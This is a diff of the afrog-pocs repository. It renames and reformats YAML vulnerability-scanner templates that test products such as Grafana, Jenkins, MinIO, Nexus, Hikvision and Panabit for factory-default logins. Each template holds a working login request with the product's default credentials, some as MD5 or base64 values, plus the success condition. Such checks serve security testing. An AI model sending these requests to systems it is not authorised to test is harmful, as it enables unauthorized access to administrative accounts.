93	75		expression: response.status == 200 && response.headers["content-type"].contains("application/json") && response.body.bcontains(b'"access_token":') && response.body.bcontains(b'"token_type":') && response.body.bcontains(b'"refresh_token":')
94	76		r5:
95	77		request:
96		-	cache: true
97	78		method: POST
98	79		path: /oauth/token
99	80		headers:
		skipped 3 lines
103	84		content-type: application/json
104	85		body: \|
105	86		{"grant_type":"password","username":"[email protected]","password":"123456789"}
106		-	follow_redirects: false
107	87		expression: response.status == 200 && response.headers["content-type"].contains("application/json") && response.body.bcontains(b'"access_token":') && response.body.bcontains(b'"token_type":') && response.body.bcontains(b'"refresh_token":')
108	88		expression: r0() \|\| r1() \|\| r2() \|\| r3() \|\| r4() \|\| r5()
109	89
		skipped 1 lines

■ ■ ■ ■ ■ ■

afrog-pocs/login/default-pwd/grafana-default-password.yml afrog-pocs/default-pwd/grafana-default-password.yaml

1	1		id: grafana-default-password
2	2
3	3		info:
4		-	name: grafana-default-password
	4	+	name: Grafana Default Password
5	5		author: For3stCo1d (https://github.com/For3stCo1d)
6	6		severity: high
7	7
8		-	transport: http
9	8		rules:
10	9		r0:
11	10		request:
		skipped 17 lines

■ ■ ■ ■ ■ ■

afrog-pocs/login/default-pwd/hikvision-intercom-service-default-password.yml afrog-pocs/default-pwd/hikvision-intercom-service-default-password.yaml

1	1		id: hikvision-intercom-service-default-password
2	2
3	3		info:
4		-	name: hikvision-intercom-service-default-password
	4	+	name: Hikvision Intercom Service Default Password
5	5		author: xueba(user/pass=admin/12345)
6	6		severity: high
7	7
8		-	manual: true
9		-	transport: http
10	8		rules:
11	9		r0:
12	10		request:
13		-	cache: true
14	11		method: GET
15	12		path: /
16	13		expression: response.status == 200 && response.body.bcontains(bytes("document.title = LOGIN_BTN_LOGIN"))
17	14		r1:
18	15		request:
19		-	cache: true
20	16		method: POST
21	17		path: /authorize.action
22	18		body: \|
23	19		username=admin&userpsw=827ccb0eea8a706c4c34a16891f84e7b&language=zh_cn
24		-	follow_redirects: false
25	20		expression: 'response.status == 200 && response.body.bcontains(b"{\"success\": true, \"msg\": \"OK\"}")'
26	21		expression: r0() && r1()
27	22
		skipped 1 lines

■ ■ ■ ■ ■ ■

afrog-pocs/login/default-pwd/jenkins-default-pwd.yaml afrog-pocs/default-pwd/jenkins-default-pwd.yaml

		skipped 3 lines
4	4		name: Jenkins Default Password
5	5		author: zan8in
6	6		severity: high
7		-	tags: jenkins,default-login
8	7
9		-	transport: http
10	8		rules:
11	9		r0:
12	10		request:
13		-	todo: TODO_FAILURE_NOT_CONTINUE
14	11		method: GET
15	12		path: /login
16	13		expression: \|
17	14		response.status == 200 && response.body.bcontains(b'Sign in [Jenkins]')
	15	+	stop_if_mismatch: true
18	16		r1:
19	17		request:
20		-	todo: TODO_SUCCESS_NOT_CONTINUE
21	18		method: POST
22	19		path: /j_spring_security_check
23	20		body: \|
24	21		j_username=admin&j_password=admin&from=&Submit=Sign+in
25	22		expression: \|
26	23		response.status == 302 && !response.headers["location"].contains("loginError")
	24	+	stop_if_match: true
27	25		r2:
28	26		request:
29		-	todo: TODO_SUCCESS_NOT_CONTINUE
30	27		method: POST
31	28		path: /j_spring_security_check
32	29		body: \|
33	30		j_username=jenkins&j_password=password&from=&Submit=Sign+in
34	31		expression: \|
35	32		response.status == 302 && !response.headers["location"].contains("loginError")
	33	+	stop_if_match: true
36	34		expression: \|
37	35		r0() && (r1() \|\| r2())
38	36

■ ■ ■ ■ ■ ■

afrog-pocs/unreviewed/jinher-oa-c6-default-password.yml afrog-pocs/default-pwd/jinher-oa-c6-default-password.yaml

1	1		id: jinher-oa-c6-default-password
2	2
3	3		info:
4		-	name: jinher-oa-c6-default-password
	4	+	name: Jinher OA C6 Default Password
5	5		author: iak3ec(https://github.com/nu0l)
6	6		severity: high
7	7
8		-	manual: true
9		-	transport: http
10	8		rules:
11	9		jiner:
12	10		request:
13		-	cache: true
14	11		method: POST
15	12		path: /c6/Jhsoft.Web.login/AjaxForLogin.aspx
16	13		body:
		skipped 5 lines

■ ■ ■ ■ ■ ■

afrog-pocs/unreviewed/kingsoft-v8-default-password.yml afrog-pocs/default-pwd/kingsoft-v8-default-password.yaml

1	1		id: kingsoft-v8-default-password
2	2
3	3		info:
4		-	name: kingsoft-v8-default-password
	4	+	name: Kingsoft V8 Default Password
5	5		author: B1anda0(https://github.com/B1anda0)
6	6		severity: high
7	7
8		-	manual: true
9		-	transport: http
10	8		rules:
11	9		r0:
12	10		request:
13		-	cache: true
14	11		method: POST
15	12		path: /inter/ajax.php?cmd=get_user_login_cmd
16	13		body: '{"get_user_login_cmd":{"name":"admin","password":"21232f297a57a5a743894a0e4a801fc3"}}'
		skipped 5 lines

■ ■ ■ ■ ■ ■

afrog-pocs/login/default-pwd/minio-default-password.yml afrog-pocs/default-pwd/minio-default-password.yaml

1	1		id: minio-default-password
2	2
3	3		info:
4		-	name: minio-default-password
	4	+	name: Minio Default Password
5	5		author: harris2015
6	6		severity: high
7	7		reference:
8	8		- https://docs.min.io/cn/
9	9
10		-	manual: true
11		-	transport: http
12	10		rules:
13	11		poc10:
14	12		request:
		skipped 2 lines
17	15		headers:
18	16		Content-Type: application/json
19	17		body: '{"id":1,"jsonrpc":"2.0","params":{"username":"minioadmin","password":"minioadmin"},"method":"Web.Login"}'
20		-	follow_redirects: false
21	18		expression: response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"uiVersion") && response.body.bcontains(b"token")
22	19		poc20:
23	20		request:
		skipped 2 lines
26	23		headers:
27	24		Content-Type: application/json
28	25		body: '{"id":1,"jsonrpc":"2.0","params":{"username":"minioadmin","password":"minioadmin"},"method":"web.Login"}'
29		-	follow_redirects: false
30	26		expression: response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"uiVersion") && response.body.bcontains(b"token")
31	27		expression: poc10() \|\| poc20()
32	28

■ ■ ■ ■ ■ ■

afrog-pocs/unreviewed/netentsec-icg-default-password.yml afrog-pocs/default-pwd/netentsec-icg-default-password.yaml

1	1		id: netentsec-icg-default-password
2	2
3	3		info:
4		-	name: netentsec-icg-default-password
	4	+	name: Netentsec Icg Default Password
5	5		author: B1anda0(https://github.com/B1anda0)
6	6		severity: high
7	7
8		-	manual: true
9		-	transport: http
10	8		rules:
11	9		r0:
12	10		request:
13		-	cache: true
14	11		method: POST
15	12		path: /user/login/checkPermit
16	13		body: usrname=ns25000&pass=ns25000
		skipped 4 lines

■ ■ ■ ■ ■ ■

afrog-pocs/unreviewed/nexus-default-password.yml afrog-pocs/default-pwd/nexus-default-password.yaml

1	1		id: nexus-default-password
2	2
3	3		info:
4		-	name: nexus-default-password
	4	+	name: Nexus Default Password
5	5		author: Soveless(https://github.com/Soveless)
6	6		severity: high
7	7
8		-	manual: true
9		-	transport: http
10	8		rules:
11	9		r0:
12	10		request:
13		-	cache: true
14	11		method: GET
15	12		path: /service/local/authentication/login
16	13		headers:
17	14		Accept: application/json
18	15		Authorization: Basic YWRtaW46YWRtaW4xMjM=
19		-	follow_redirects: false
20	16		expression: response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"loggedIn")
21	17		expression: r0()
22	18
		skipped 1 lines

■ ■ ■ ■ ■ ■

afrog-pocs/unreviewed/nps-default-password.yml afrog-pocs/default-pwd/nps-default-password.yaml

1	1		id: nps-default-password
2	2
3	3		info:
4		-	name: nps-default-password
5		-	author:
	4	+	name: Nps Default Password
	5	+	author: unkown
6	6		severity: high
7	7
8		-	manual: true
9		-	transport: http
10	8		rules:
11	9		r0:
12	10		request:
13		-	cache: true
14	11		method: POST
15	12		path: /login/verify
16	13		body: username=admin&password=123
		skipped 4 lines

■ ■ ■ ■ ■ ■

afrog-pocs/login/default-pwd/openerp-default-password.yml afrog-pocs/default-pwd/openerp-default-password.yaml

1	1		id: openerp-default-password
2	2
3	3		info:
4		-	name: openerp-default-password
	4	+	name: Openerp Default Password
5	5		author: zan8in
6	6		severity: high
7	7
8	8		set:
9	9		hosturl: request.url
10	10		r1: md5(randomLowercase(6))
11		-	manual: true
12		-	transport: http
13	11		rules:
14	12		r0:
15	13		request:
16		-	cache: true
17	14		method: POST
18	15		path: /web/session/authenticate
19	16		headers:
		skipped 13 lines

■ ■ ■ ■ ■ ■

afrog-pocs/unreviewed/panabit-gateway-default-password.yml afrog-pocs/default-pwd/panabit-gateway-default-password.yaml

1	1		id: panabit-gateway-default-password
2	2
3	3		info:
4		-	name: panabit-gateway-default-password
	4	+	name: Panabit Gateway Default Password
5	5		author: Print1n(https://github.com/Print1n)
6	6		severity: high
7	7
8		-	manual: true
9		-	transport: http
10	8		rules:
11	9		r0:
12	10		request:
13		-	cache: true
14	11		method: POST
15	12		path: /login/userverify.cgi
16	13		body: username=admin&password=panabit
		skipped 4 lines

■ ■ ■ ■ ■ ■

afrog-pocs/unreviewed/panabit-ixcache-default-password.yml afrog-pocs/default-pwd/panabit-ixcache-default-password.yaml

1	1		id: panabit-ixcache-default-password
2	2
3	3		info:
4		-	name: panabit-ixcache-default-password
	4	+	name: Panabit Ixcache Default Password
5	5		author: B1anda0(https://github.com/B1anda0)
6	6		severity: high
7	7
8		-	manual: true
9		-	transport: http
10	8		rules:
11	9		r0:
12	10		request:
13		-	cache: true
14	11		method: POST
15	12		path: /login/userverify.cgi
16	13		body: username=admin&password=ixcache
		skipped 4 lines

afrog-pocs v0.0.2